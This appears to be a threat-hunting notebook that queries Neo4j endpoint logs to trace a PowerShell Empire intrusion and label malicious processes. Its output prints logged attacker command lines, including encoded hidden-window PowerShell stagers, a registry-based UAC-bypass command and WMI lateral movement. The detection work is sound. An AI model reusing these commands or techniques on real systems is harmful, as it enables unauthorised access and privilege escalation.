In [1]:
#Get plaintext secrets

from configparser import ConfigParser
parser = ConfigParser()
_ = parser.read('secrets.cfg')
neo4j_useraccount = parser.get('my_data', 'neo4j_useraccount')
neo4j_password = parser.get('my_data', 'neo4j_password')


In [2]:
import pandas as pd
import configparser
import os
pd.set_option('display.width', 0)
pd.set_option('display.max_colwidth', 0)
pd.set_option('display.max_rows', 50)

In [3]:
from graphdatascience import GraphDataScience

host = "bolt://172.17.0.2:7687"
user = neo4j_useraccount
password= neo4j_password

gds = GraphDataScience(host, auth=(user, password))

In [4]:
#-- Manually accessed console on Sysclient0201 and navigated to news.com:8000 to download runme.bat, a malicous
#Powershell empire stager

#-- look for the file creation of runme.bat

manually_download_malware=gds.run_cypher("""
MATCH (n:File) where n.file_path contains "runme.bat" 
return n.EventTime,n.Hostname,n.Image_path,n.ProcessGuid,n.ProcessID,n.User,n.file_path,n.unknown
""") 


In [5]:
manually_download_malware

,n.EventTime,n.Hostname,n.Image_path,n.ProcessGuid,n.ProcessID,n.User,n.file_path,n.unknown
0,2019-09-23 11:23:43.956000-04:00,SysClient0201.systemia.com,\Device\HarddiskVolume1\Program Files (x86)\Mozilla Firefox\firefox.exe,a5cb4219-8dd8-49ef-bbcb-1e164db3cc22,3520,SYSTEMIACOM\zleazer,\Device\HarddiskVolume1\Users\zleazer\Downloads\runme.bat,7495bfe7-4803-4d75-987c-09dc23646d60
1,2019-09-23 11:23:44.267000-04:00,SysClient0201.systemia.com,\Device\HarddiskVolume1\Program Files (x86)\Mozilla Firefox\firefox.exe,a5cb4219-8dd8-49ef-bbcb-1e164db3cc22,3520,SYSTEMIACOM\zleazer,\Device\HarddiskVolume1\Users\zleazer\Downloads\runme.bat:Zone.Identifier,c4f521b8-4a47-4d50-bd5f-0c61b23bc58a


In [6]:
#execution of the malware

In [7]:
#-- look for the execution of the runme.bat

manually_run_malware= gds.run_cypher("""
MATCH (p:Process)
where p.CommandLine contains "runme.bat"
RETURN p.EventTime as EventTime, p.Hostname as Hostname ,p.CommandLine as CommandLine ,p.CommandLine_length as CommandLine_Length,p.ProcessGuid as ProcessGuid,p.direct_children as Direct_Children,
p.network_degree as Network_Degree,p.Image_path as Image_Path,p.numbers_of_executed_commands as Numbers_of_executed_commands, p.User as User,p.Sid as Sid,p.Principal as Principal, p.malicious as Malicious
""") 

In [8]:
manually_run_malware

,EventTime,Hostname,CommandLine,CommandLine_Length,ProcessGuid,Direct_Children,Network_Degree,Image_Path,Numbers_of_executed_commands,User,Sid,Principal,Malicious
0,2019-09-23 11:23:54.681000-04:00,SysClient0201.systemia.com,"C:\Windows\system32\cmd.exe /c """"C:\Users\zleazer\Downloads\runme.bat"" """,72,af6b49d5-f648-41a4-946d-d92b174bae47,2.0,0.0,\Device\HarddiskVolume1\Windows\system32\cmd.exe,0.0,SYSTEMIACOM\zleazer,S-1-5-21-4190936083-3304963419-1584388968-3346,SYSTEMIACOM\zleazer,0


In [9]:
#-- 09/23/19 11:24:54 -- Successfull checkin for Agent VL8B5T3U on Sysclient0201 ip 142.20.56.202
#-- look for the children of runme.bat

manually_run_malware= gds.run_cypher("""
MATCH (p:Process )-[:Parent]->(y:Process {ProcessGuid: "af6b49d5-f648-41a4-946d-d92b174bae47"})
RETURN p.EventTime as EventTime, p.Hostname as Hostname ,p.CommandLine as CommandLine ,p.CommandLine_length as CommandLine_Length,p.network_degree as Network_Degree,p.direct_children as Direct_Children,p.Image_path as Image_Path,p.ProcessGuid as ProcessGuid,p.numbers_of_executed_commands as Numbers_of_executed_commands,p.User as User,p.Sid as Sid,p.Principal as Principal, p.malicious as Malicious
""") 

In [10]:
manually_run_malware

,EventTime,Hostname,CommandLine,CommandLine_Length,Network_Degree,Direct_Children,Image_Path,ProcessGuid,Numbers_of_executed_commands,User,Sid,Principal,Malicious
0,2019-09-23 11:23:55.857000-04:00,SysClient0201.systemia.com,powershell -noP -sta -w 1 -enc SQBGACgAJABQAFMAVgBFAHIAUwBJAG8ATgBUAGEAYgBMAGUALgBQAFMAVgBFAHIAcwBJAE8ATgAuAE0AQQBqAG8AcgAgAC0ARwBlACAAMwApAHsAJABHAFAARgA9AFsAUgBlAGYAXQAuAEEAcwBzAEUATQBiAEwAeQAuAEcAZQBUAFQAeQBQAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBVAHQAaQBsAHMAJwApAC4AIgBHAGUAdABGAEkAZQBgAGwAZAAiACgAJwBjAGEAYwBoAGUAZABHAHIAbwB1AHAAUABvAGwAaQBjAHkAUwBlAHQAdABpAG4AZwBzACcALAAnAE4AJwArACcAbwBuAFAAdQBiAGwAaQBjACwAUwB0AGEAdABpAGMAJwApADsASQBmACgAJABHAFAARgApAHs,512,40.0,4.0,powershell.exe,96913629-c1c9-4503-9586-4a91de0e7311,274.0,SYSTEMIACOM\zleazer,S-1-5-21-4190936083-3304963419-1584388968-3346,SYSTEMIACOM\zleazer,0
1,2019-09-23 11:23:54.717000-04:00,SysClient0201.systemia.com,\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1,55,0.0,0.0,\Device\HarddiskVolume1\Windows\system32\conhost.exe,235bd5cc-a720-4107-a5f0-873f628ccd13,0.0,SYSTEMIACOM\zleazer,S-1-5-21-4190936083-3304963419-1584388968-3346,SYSTEMIACOM\zleazer,0


In [11]:
%%time
#Declare the ones we found to be malicious as malicious
gds.run_cypher("""
MATCH (p:Process  {ProcessGuid: "96913629-c1c9-4503-9586-4a91de0e7311"})
SET p.malicious = 1

""") 

CPU times: user 1.34 ms, sys: 851 µs, total: 2.2 ms
Wall time: 4.63 ms


""


In [12]:
#look at the children of the previous one
manually_run_malware= gds.run_cypher("""
MATCH (p:Process )-[:Parent]->(y:Process {ProcessGuid: "96913629-c1c9-4503-9586-4a91de0e7311"})
RETURN p.EventTime as EventTime, p.Hostname as Hostname ,p.CommandLine as CommandLine ,p.CommandLine_length as CommandLine_Length,p.network_degree as Network_Degree,p.direct_children as Direct_Children,p.Image_path as Image_Path,p.ProcessGuid as ProcessGuid,p.numbers_of_executed_commands as Numbers_of_executed_commands,p.User as User,p.Sid as Sid,p.Principal as Principal, p.malicious as Malicious
""") 

In [13]:
manually_run_malware

,EventTime,Hostname,CommandLine,CommandLine_Length,Network_Degree,Direct_Children,Image_Path,ProcessGuid,Numbers_of_executed_commands,User,Sid,Principal,Malicious
0,2019-09-23 11:25:47.441000-04:00,SysClient0201.systemia.com,"""C:\Windows\system32\whoami.exe"" /groups",40,0.0,0.0,\Device\HarddiskVolume1\Windows\system32\whoami.exe,43f77797-b48b-4999-b563-aafd26402c1c,0.0,SYSTEMIACOM\zleazer,S-1-5-21-4190936083-3304963419-1584388968-3346,SYSTEMIACOM\zleazer,0
1,2019-09-23 11:25:47.825000-04:00,SysClient0201.systemia.com,"""C:\Windows\system32\schtasks.exe"" /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I",92,0.0,0.0,\Device\HarddiskVolume1\Windows\system32\schtasks.exe,bd985332-cb00-414b-8256-e4df5f392d0c,0.0,SYSTEMIACOM\zleazer,S-1-5-21-4190936083-3304963419-1584388968-3346,SYSTEMIACOM\zleazer,0
2,2019-09-23 11:25:47.217000-04:00,SysClient0201.systemia.com,"""C:\Windows\system32\whoami.exe"" /groups",40,0.0,0.0,\Device\HarddiskVolume1\Windows\system32\whoami.exe,e3151ee1-65a9-416a-8852-c0650c295180,0.0,SYSTEMIACOM\zleazer,S-1-5-21-4190936083-3304963419-1584388968-3346,SYSTEMIACOM\zleazer,0
3,2019-09-23 11:47:19.234000-04:00,SysClient0201.systemia.com,taskkill /F /IM AdobeARM.exe,29,0.0,0.0,taskkill.exe,fe7ecd6b-1ef5-4c83-af64-f794ac5d7169,0.0,SYSTEMIACOM\zleazer,S-1-5-21-4190936083-3304963419-1584388968-3346,SYSTEMIACOM\zleazer,0


In [14]:
#-- 09/23/19 11:26:02 -- On Sysclient0201 agent VL8B5T3U, Used PowershellEmpire Module Bypasses UAC, which performs a registry modification
#-- of the "windir" value in "Environment" to bypass UAC.

#-- look for attempted to bypass UAC with module privesc/bypassuac_env
#-- powershell empire https://github.com/EmpireProject/Empire/blob/master/lib/modules/powershell/privesc/bypassuac_env.py
#-- https://github.com/EmpireProject/Empire/blob/master/data/module_source/privesc/Invoke-EnvBypass.ps1
#-- https://tyranidslair.blogspot.cz/2017/05/exploiting-environment-variables-in.html)
#-- search for HKCU
#-- looking for event on SysClient0201  only.

manually_run_malware= gds.run_cypher("""
MATCH (p:Process)
where p.CommandLine contains "HKCU" and p.Hostname contains "SysClient0201.systemia.com"
RETURN p.EventTime as EventTime, p.Hostname as Hostname ,p.CommandLine as CommandLine ,p.CommandLine_length as CommandLine_Length,p.network_degree as Network_Degree,p.direct_children as Direct_Children,p.Image_path as Image_Path,p.ProcessGuid as ProcessGuid,p.numbers_of_executed_commands as Numbers_of_executed_commands,p.User as User,p.Sid as Sid,p.Principal as Principal, p.malicious as Malicious
""") 

In [15]:
manually_run_malware

,EventTime,Hostname,CommandLine,CommandLine_Length,Network_Degree,Direct_Children,Image_Path,ProcessGuid,Numbers_of_executed_commands,User,Sid,Principal,Malicious
0,2019-09-23 11:25:48.068000-04:00,SysClient0201.systemia.com,C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoP -NonI -w Hidden -c $x=$((gp HKCU:Software\Microsoft\Windows Update).Update); powershell -NoP -NonI -w Hidden -enc $x; Start-Sleep -Seconds 1\system32\cleanmgr.exe /autoclean /d C:,242,0.0,2.0,\Device\HarddiskVolume1\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,f5d1c003-1f65-4a8a-ba8c-413da99d70f2,7.0,SYSTEMIACOM\zleazer,S-1-5-21-4190936083-3304963419-1584388968-3346,SYSTEMIACOM\zleazer,0


In [16]:
%%time
#Declare the ones we found to be malicious as malicious
gds.run_cypher("""
MATCH (p:Process{ProcessGuid: "f5d1c003-1f65-4a8a-ba8c-413da99d70f2"})
SET p.malicious = 1

""") 

CPU times: user 2 ms, sys: 0 ns, total: 2 ms
Wall time: 3.68 ms


""


In [17]:
## -- look at the shell commands executed by this one

shell_commands_executed= gds.run_cypher("""
MATCH (s:Shell {ProcessGuid: "f5d1c003-1f65-4a8a-ba8c-413da99d70f2"})
RETURN s.Command_Name,s.Command_Path,s.Command_Type,s.Hostname, s.Host_type, s.Console_Version, s.Principal, s.Runspace_ID,s.Script_Name,s.Sequence_Number,s.Severity_level,s.Shell_User,s.Shell_type,s.User,s.timestamp_str
""") 

In [18]:
shell_commands_executed

,s.Command_Name,s.Command_Path,s.Command_Type,s.Hostname,s.Host_type,s.Console_Version,s.Principal,s.Runspace_ID,s.Script_Name,s.Sequence_Number,s.Severity_level,s.Shell_User,s.Shell_type,s.User,s.timestamp_str
0,Get-ItemProperty,,Cmdlet,SysClient0201.systemia.com,ConsoleHost,5.1.15063.1746,SYSTEMIACOM\zleazer,a57c1700-8634-4c85-8411-54fcb1a043dc,,16,Informational,SYSTEMIACOM\zleazer,Microsoft.PowerShell,None,2019-09-23 11:25:53.191000-04:00
1,Start-Sleep,,Cmdlet,SysClient0201.systemia.com,ConsoleHost,5.1.15063.1746,SYSTEMIACOM\zleazer,a57c1700-8634-4c85-8411-54fcb1a043dc,,18,Informational,SYSTEMIACOM\zleazer,Microsoft.PowerShell,None,2019-09-23 14:05:10.103000-04:00
2,Set-StrictMode,,Cmdlet,SysClient0201.systemia.com,ConsoleHost,5.1.15063.1746,SYSTEMIACOM\zleazer,a57c1700-8634-4c85-8411-54fcb1a043dc,,20,Informational,SYSTEMIACOM\zleazer,Microsoft.PowerShell,None,2019-09-23 14:05:10.228000-04:00
3,Set-StrictMode,,Cmdlet,SysClient0201.systemia.com,ConsoleHost,5.1.15063.1746,SYSTEMIACOM\zleazer,a57c1700-8634-4c85-8411-54fcb1a043dc,,22,Informational,SYSTEMIACOM\zleazer,Microsoft.PowerShell,None,2019-09-23 14:05:10.233000-04:00
4,Set-StrictMode,,Cmdlet,SysClient0201.systemia.com,ConsoleHost,5.1.15063.1746,SYSTEMIACOM\zleazer,a57c1700-8634-4c85-8411-54fcb1a043dc,,26,Informational,SYSTEMIACOM\zleazer,Microsoft.PowerShell,None,2019-09-23 14:05:10.274000-04:00
5,Set-StrictMode,,Cmdlet,SysClient0201.systemia.com,ConsoleHost,5.1.15063.1746,SYSTEMIACOM\zleazer,a57c1700-8634-4c85-8411-54fcb1a043dc,,24,Informational,SYSTEMIACOM\zleazer,Microsoft.PowerShell,None,2019-09-23 14:05:10.260000-04:00
6,,,Script,SysClient0201.systemia.com,ConsoleHost,5.1.15063.1746,SYSTEMIACOM\zleazer,a57c1700-8634-4c85-8411-54fcb1a043dc,,28,Informational,SYSTEMIACOM\zleazer,Microsoft.PowerShell,None,2019-09-23 14:05:10.300000-04:00


In [19]:
#-- 09/23/19 11:26:38 -- On sysclient0201, successful checkin of elevated agent LUAVR71T


#Look at the childprocess of the bypassuac in the previous one


manually_run_malware= gds.run_cypher("""
MATCH (p:Process )-[:Parent]->(y:Process {ProcessGuid: "f5d1c003-1f65-4a8a-ba8c-413da99d70f2"})
RETURN p.EventTime as EventTime, p.Hostname as Hostname ,p.CommandLine as CommandLine ,p.CommandLine_length as CommandLine_Length,p.network_degree as Network_Degree,p.direct_children as Direct_Children,p.Image_path as Image_Path,p.ProcessGuid as ProcessGuid,p.numbers_of_executed_commands as Numbers_of_executed_commands,p.User as User,p.Sid as Sid,p.Principal as Principal, p.malicious as Malicious
""") 

In [20]:
manually_run_malware

,EventTime,Hostname,CommandLine,CommandLine_Length,Network_Degree,Direct_Children,Image_Path,ProcessGuid,Numbers_of_executed_commands,User,Sid,Principal,Malicious
0,2019-09-23 11:25:48.329000-04:00,SysClient0201.systemia.com,\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1,55,0.0,0.0,\Device\HarddiskVolume1\Windows\system32\conhost.exe,2ef956fb-3d21-4f24-915a-e1fca686cd32,0.0,SYSTEMIACOM\zleazer,S-1-5-21-4190936083-3304963419-1584388968-3346,SYSTEMIACOM\zleazer,0
1,2019-09-23 11:25:52.486000-04:00,SysClient0201.systemia.com,"""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -NoP -NonI -w Hidden -enc SQBGACgAJABQAFMAVgBFAHIAUwBpAG8ATgBUAEEAYgBMAGUALgBQAFMAVgBlAHIAUwBpAG8AbgAuAE0AYQBKAE8AcgAgAC0ARwBlACAAMwApAHsAJABHAFAARgA9AFsAcgBFAGYAXQAuAEEAcwBzAGUATQBCAGwAeQAuAEcAZQB0AFQAeQBwAEUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBVAHQAaQBsAHMAJwApAC4AIgBHAEUAdABGAGkARQBgAEwARAAiACgAJwBjAGEAYwBoAGUAZABHAHIAbwB1AHAAUABvAGwAaQBjAHkAUwBlAHQAdABpAG4AZwBzACcALAAnAE4AJwArACcAbwBuAFAAdQBiAGwAaQ",512,1843.0,257.0,\Device\HarddiskVolume1\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,a52f6519-6265-4437-9f6c-3402fb245cc7,17098.0,SYSTEMIACOM\zleazer,S-1-5-21-4190936083-3304963419-1584388968-3346,SYSTEMIACOM\zleazer,0


In [21]:
%%time
#Declare the ones we found to be malicious as malicious
gds.run_cypher("""
MATCH (p:Process{ProcessGuid: "a52f6519-6265-4437-9f6c-3402fb245cc7"})
SET p.malicious = 1

""") 

CPU times: user 1.49 ms, sys: 867 µs, total: 2.36 ms
Wall time: 4.41 ms


""


In [22]:
## -- look at the shell commands executed by this one

shell_commands_executed= gds.run_cypher("""
MATCH (s:Shell {ProcessGuid: "a52f6519-6265-4437-9f6c-3402fb245cc7"})
RETURN s.Command_Name,s.Command_Path,s.Command_Type,s.Hostname, s.Host_type, s.Console_Version, s.Principal, s.Runspace_ID,s.Script_Name,s.Sequence_Number,s.Severity_level,s.Shell_User,s.Shell_type,s.User,s.timestamp_str
""") 

In [23]:
shell_commands_executed

,s.Command_Name,s.Command_Path,s.Command_Type,s.Hostname,s.Host_type,s.Console_Version,s.Principal,s.Runspace_ID,s.Script_Name,s.Sequence_Number,s.Severity_level,s.Shell_User,s.Shell_type,s.User,s.timestamp_str
0,Where-Object,,Cmdlet,SysClient0201.systemia.com,ConsoleHost,5.1.15063.1746,SYSTEMIACOM\zleazer,d4661c04-c982-4586-b33f-18d2a639aef6,,16,Informational,SYSTEMIACOM\zleazer,Microsoft.PowerShell,None,2019-09-23 11:25:57.116000-04:00
1,New-Object,,Cmdlet,SysClient0201.systemia.com,ConsoleHost,5.1.15063.1746,SYSTEMIACOM\zleazer,d4661c04-c982-4586-b33f-18d2a639aef6,,18,Informational,SYSTEMIACOM\zleazer,Microsoft.PowerShell,None,2019-09-23 11:25:57.570000-04:00
2,ForEach-Object,,Cmdlet,SysClient0201.systemia.com,ConsoleHost,5.1.15063.1746,SYSTEMIACOM\zleazer,d4661c04-c982-4586-b33f-18d2a639aef6,,20,Informational,SYSTEMIACOM\zleazer,Microsoft.PowerShell,None,2019-09-23 11:25:58.071000-04:00
3,New-Object,,Cmdlet,SysClient0201.systemia.com,ConsoleHost,5.1.15063.1746,SYSTEMIACOM\zleazer,d4661c04-c982-4586-b33f-18d2a639aef6,,24,Informational,SYSTEMIACOM\zleazer,Microsoft.PowerShell,None,2019-09-23 11:25:58.773000-04:00
4,New-Object,,Cmdlet,SysClient0201.systemia.com,ConsoleHost,5.1.15063.1746,SYSTEMIACOM\zleazer,d4661c04-c982-4586-b33f-18d2a639aef6,,28,Informational,SYSTEMIACOM\zleazer,Microsoft.PowerShell,None,2019-09-23 11:25:58.882000-04:00
...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...
17093,ForEach-Object,,Cmdlet,SysClient0201.systemia.com,ConsoleHost,5.1.15063.1746,SYSTEMIACOM\zleazer,d4661c04-c982-4586-b33f-18d2a639aef6,,34972,Informational,SYSTEMIACOM\zleazer,Microsoft.PowerShell,None,2019-09-23 14:05:09.072000-04:00
17094,Get-Random,,Cmdlet,SysClient0201.systemia.com,ConsoleHost,5.1.15063.1746,SYSTEMIACOM\zleazer,d4661c04-c982-4586-b33f-18d2a639aef6,,34974,Informational,SYSTEMIACOM\zleazer,Microsoft.PowerShell,None,2019-09-23 14:05:09.073000-04:00
17095,ForEach-Object,,Cmdlet,SysClient0201.systemia.com,ConsoleHost,5.1.15063.1746,SYSTEMIACOM\zleazer,d4661c04-c982-4586-b33f-18d2a639aef6,,34968,Informational,SYSTEMIACOM\zleazer,Microsoft.PowerShell,None,2019-09-23 14:05:09.065000-04:00
17096,,,Script,SysClient0201.systemia.com,ConsoleHost,5.1.15063.1746,SYSTEMIACOM\zleazer,d4661c04-c982-4586-b33f-18d2a639aef6,,34980,Informational,SYSTEMIACOM\zleazer,Microsoft.PowerShell,None,2019-09-23 14:05:09.228000-04:00


In [24]:
#-- 09/23/19 14:45:13 -- On DC1 agent XH32VTK5, used Invoke_wmi to spread to: SysClient0503.systemia.com and SysClient0205.systemia.com
#-- https://redcanary.com/threat-detection-report/techniques/windows-management-instrumentation/ 
#-- look for process with wmiprvse.exe --> powershell on SysClient0503.systemia.com

manually_run_malware= gds.run_cypher("""
MATCH (p:Process {Hostname: "SysClient0503.systemia.com"})
where p.Parent_image_path contains "wmiprvse.exe" and p.Image_path contains "powershell.exe"
RETURN p.EventTime as EventTime, p.Hostname as Hostname ,p.CommandLine as CommandLine ,p.CommandLine_length as CommandLine_Length,p.network_degree as Network_Degree,p.direct_children as Direct_Children,p.Image_path as Image_Path,p.ProcessGuid as ProcessGuid,p.numbers_of_executed_commands as Numbers_of_executed_commands,p.User as User, p.malicious as Malicious
""") 


In [25]:
manually_run_malware

,EventTime,Hostname,CommandLine,CommandLine_Length,Network_Degree,Direct_Children,Image_Path,ProcessGuid,Numbers_of_executed_commands,User,Malicious
0,2019-09-23 14:44:59.289000-04:00,SysClient0503.systemia.com,C:\Windows\System32\WindowsPowershell\v1.0\powershell -noP -sta -w 1 -enc SQBGACgAJABQAFMAVgBlAHIAcwBJAE8ATgBUAEEAQgBMAEUALgBQAFMAVgBlAFIAcwBJAE8ATgAuAE0AYQBKAG8AcgAgAC0ARwBlACAAMwApAHsAJABHAFAARgA9AFsAUgBFAEYAXQAuAEEAUwBzAGUAbQBCAGwAeQAuAEcAZQBUAFQAeQBQAEUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBVAHQAaQBsAHMAJwApAC4AIgBHAEUAdABGAEkARQBgAEwARAAiACgAJwBjAGEAYwBoAGUAZABHAHIAbwB1AHAAUABvAGwAaQBjAHkAUwBlAHQAdABpAG4AZwBzACcALAAnAE4AJwArACcAbwBuAFAAdQBiAGwAaQBjACwAUwB0A,512,449.0,1.0,powershell.exe,bff0865c-96aa-4fb9-902b-d0493b6c8b14,2676.0,SYSTEMIACOM\zleazer,0


In [26]:
%%time
#Declare the ones we found to be malicious as malicious
gds.run_cypher("""
MATCH (p:Process{ProcessGuid: "bff0865c-96aa-4fb9-902b-d0493b6c8b14"})
SET p.malicious = 1

""") 

CPU times: user 1.52 ms, sys: 931 µs, total: 2.45 ms
Wall time: 4.31 ms


""


In [27]:
#-- 09/23/19 14:45:13 -- On DC1 agent XH32VTK5, used Invoke_wmi to spread to: SysClient0503.systemia.com and SysClient0205.systemia.com
#-- https://redcanary.com/threat-detection-report/techniques/windows-management-instrumentation/ 
#-- look for process with wmiprvse.exe --> powershell on SysClient0205.systemia.com

manually_run_malware= gds.run_cypher("""
MATCH (p:Process {Hostname: "SysClient0205.systemia.com"})
where p.Parent_image_path contains "wmiprvse.exe" and p.Image_path contains "powershell.exe"
RETURN p.EventTime as EventTime, p.Hostname as Hostname ,p.CommandLine as CommandLine ,p.CommandLine_length as CommandLine_Length,p.network_degree as Network_Degree,p.direct_children as Direct_Children,p.Image_path as Image_Path,p.ProcessGuid as ProcessGuid,p.numbers_of_executed_commands as Numbers_of_executed_commands,p.User as User,p.Sid as Sid,p.Principal as Principal, p.malicious as Malicious
""") 



In [28]:
manually_run_malware

,EventTime,Hostname,CommandLine,CommandLine_Length,Network_Degree,Direct_Children,Image_Path,ProcessGuid,Numbers_of_executed_commands,User,Sid,Principal,Malicious
0,2019-09-23 14:44:54.877000-04:00,SysClient0205.systemia.com,C:\Windows\System32\WindowsPowershell\v1.0\powershell -noP -sta -w 1 -enc SQBGACgAJABQAFMAVgBlAHIAcwBJAE8ATgBUAEEAQgBMAEUALgBQAFMAVgBlAFIAcwBJAE8ATgAuAE0AYQBKAG8AcgAgAC0ARwBlACAAMwApAHsAJABHAFAARgA9AFsAUgBFAEYAXQAuAEEAUwBzAGUAbQBCAGwAeQAuAEcAZQBUAFQAeQBQAEUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBVAHQAaQBsAHMAJwApAC4AIgBHAEUAdABGAEkARQBgAEwARAAiACgAJwBjAGEAYwBoAGUAZABHAHIAbwB1AHAAUABvAGwAaQBjAHkAUwBlAHQAdABpAG4AZwBzACcALAAnAE4AJwArACcAbwBuAFAAdQBiAGwAaQBjACwAUwB0A,512,450.0,1.0,powershell.exe,64c0966e-66f8-452a-b8d9-ced3e2220a18,2687.0,SYSTEMIACOM\zleazer,S-1-5-21-4190936083-3304963419-1584388968-3346,SYSTEMIACOM\zleazer,0


In [29]:
%%time
#Declare the ones we found to be malicious as malicious
gds.run_cypher("""
MATCH (p:Process{ProcessGuid: "64c0966e-66f8-452a-b8d9-ced3e2220a18"})
SET p.malicious = 1

""") 

CPU times: user 55 µs, sys: 1.98 ms, total: 2.04 ms
Wall time: 3.56 ms


""


In [30]:
#### END of day 1 